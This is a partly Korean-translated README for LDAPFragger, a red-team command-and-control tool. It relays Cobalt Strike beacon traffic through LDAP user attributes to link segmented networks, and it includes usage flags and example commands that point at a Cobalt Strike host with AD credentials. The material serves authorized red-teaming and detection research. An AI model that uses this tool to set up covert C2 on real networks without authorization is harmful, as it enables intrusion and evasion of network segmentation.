
분할된 네트워크에서 은밀한 명령 및 제어를 위해 LDAP 사용자 속성을 통해 Cobalt Strike 비콘 데이터를 라우팅하는 C2 도구.
LDAPFragger는 공격자가 사용자 속성을 이용해 Cobalt Strike 비콘 데이터를 LDAP을 통해 라우팅할 수 있게 해주는 명령 및 제어 도구입니다.
배경 정보는 릴리스 블로그에서 확인하세요: http://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes
.NET 4.0으로 컴파일되었지만, 이전 및 최신 .NET 프레임워크에서도 작동할 수 있습니다. _ _ __
| | | | / _|
| | __| | __ _ _ __ | |_ _ __ __ _ __ _ __ _ ___ _ __
| |/ _` |/ _` | '_ \| _| '__/ _` |/ _` |/ _` |/ _ \ '__|
| | (_| | (_| | |_) | | | | | (_| | (_| | (_| | __/ |
|_|\__,_|\__,_| .__/|_| |_| \__,_|\__, |\__, |\___|_|
| | __/ | __/ |
|_| |___/ |___/
Fox-IT - Rindert Kramer
Usage:
--cshost: IP address or hostname of the Cobalt Strike instance
--csport: Port of the external C2 interface on the Cobalt Strike server
-u: Username to connect to Active Directory
-p: Password to connect to Active Directory
-d: FQDN of the Active Directory domain
--ldaps: Use LDAPS instead of LDAP
-v: Verbose output
-h: Display this message
If no AD credentials are provided, integrated AD authentication will be used.
사용 예시:

네트워크 세그먼트 A에서 다음을 실행:
LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port>
LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port> -u <username> -p <password> -d <domain FQDN>
네트워크 세그먼트 B에서 다음을 실행:
LDAPFragger
LDAPFragger -u <username> -p <password> -d <domain FQDN>
LDAPS는 --LDAPS 플래그로 사용할 수 있지만, 일반 LDAP 트래픽도 암호화됩니다. 기본 Cobalt Strike 페이로드는 대부분의 안티바이러스에 탐지될 수 있음을 유의하세요.